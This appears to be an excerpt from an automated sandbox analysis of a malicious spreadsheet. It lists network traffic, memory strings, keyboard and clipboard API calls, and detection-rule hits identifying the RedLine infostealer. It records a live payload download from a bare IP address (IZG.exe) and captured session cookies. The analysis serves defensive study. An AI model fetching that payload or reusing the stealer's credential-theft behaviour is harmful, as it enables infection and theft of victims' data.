                  Source: global traffic | HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA; 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                  Source: global traffic | HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                  Source: global traffic | HTTP traffic detected: GET /async/newtab_promos HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                  Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKiDzLEGIjBAUeVDNkDlIZK5bJjKqxg5bm1WdYDjlLN5FTPlXAMxmGzLgqn1-pjmnO28YPm4sx4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                  Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKiDzLEGIjDtjnMJodbdiXF-HQ_fQDkAxnKugxL_IiaU5Bdf1yGe-xSVBDfYF_nK-idk43_IHf0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                  Source: global traffic | HTTP traffic detected: GET /IZG.exe HTTP/1.1
                      Connection: Keep-Alive
                      Host: 23.94.54.101
                  Source: global traffic | DNS traffic detected: DNS query: www.google.com
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                      Cross-Origin-Resource-Policy: cross-origin
                      Content-Type: text/html; charset=UTF-8
                      X-Content-Type-Options: nosniff
                      Accept-CH: Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-Motion
                      Critical-CH: Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-Motion
                      Vary: Accept-Encoding, Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-Motion
                      Date: Thu, 02 May 2024 02:59:48 GMT
                      Server: sffe
                      Content-Length: 187622
                      X-XSS-Protection: 0
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                  Source: EQNEDT32.EXE, 00000002.00000002.457837834.00000000002EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://23.94.54.101/IZG.exe
                  Source: RegSvcs.exe, 0000000C.00000002.620104008.0000000002761000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620104008.0000000002858000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
                  Source: RegSvcs.exe, 0000000C.00000002.620104008.0000000002858000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.
                  Source: RegSvcs.exe, 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620104008.0000000002761000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620104008.000000000281C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
                  Source: RegSvcs.exe, 0000000C.00000002.620104008.0000000002858000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49169
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknown | Network traffic detected: HTTP traffic on port 49164 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49164
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49180
                  Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49176 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49174 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49179
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49177
                  Source: unknown | Network traffic detected: HTTP traffic on port 49180 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49176
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49175
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49174
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49173
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49172
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49171
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49170
                  Source: unknown | Network traffic detected: HTTP traffic on port 49175 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49171 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49173 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49177 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49179 -> 443

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, abAX9N.cs | .Net Code: _7wfqbBU
                  Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 3_2_00C1EAFF
                  Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C1ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 3_2_00C1ED6A
                  Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 3_2_00C1EAFF
                  Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C0AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput | 3_2_00C0AA57
                  Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C39576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 3_2_00C39576

                  System Summary

                  Source: sheet1.xml, type: SAMPLE | Matched rule: detects AutoLoad documents using LegacyDrawing | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.37b7770.6.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.530000.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.300000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.300000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.3766458.7.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.300ee8.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.b6f2ae.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.b70196.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.b6f2ae.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 5.2.OIU.exe.de0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer | Author: ditekSHen
                  Source: 3.2.OIU.exe.120000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 11.2.OIU.exe.a40000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer | Author: ditekSHen
                  Source: 7.2.OIU.exe.6e0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer | Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer | Author: ditekSHen
                  Source: 9.2.OIU.exe.360000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer | Author: ditekSHen
                  Source: 00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer | Author: ditekSHen
                  Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 00000005.00000002.460633124.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer | Author: ditekSHen
                  Source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                  Source: 00000009.00000002.464011217.0000000000360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer | Author: ditekSHen
                  Source: 0000000C.00000002.619889469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer | Author: ditekSHen
                  Source: 0000000B.00000002.466866889.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer | Author: ditekSHen
                  Source: 00000007.00000002.462329527.00000000006E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer | Author: ditekSHen
                  Source: OIU.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: OIU.exe, 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_5a728d17-0
                  Source: OIU.exe, 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_7f8a3710-9
                  Source: OIU.exe, 00000005.00000002.460606758.0000000000C62000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_43f1efc1-2
                  Source: OIU.exe, 00000005.00000002.460606758.0000000000C62000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_7e78ced3-6
                  Source: OIU.exe, 00000007.00000002.462376240.0000000000C62000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_0efa1f0e-d
                  Source: OIU.exe, 00000007.00000002.462376240.0000000000C62000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_78eabdf2-8
                  Source: OIU.exe, 00000009.00000000.462193481.0000000000C62000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_62c442ec-f
                  Source: OIU.exe, 00000009.00000000.462193481.0000000000C62000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_f77bbe4f-d
                  Source: OIU.exe, 0000000B.00000000.463951101.0000000000C62000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_88cb759e-8
                  Source: OIU.exe, 0000000B.00000000.463951101.0000000000C62000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 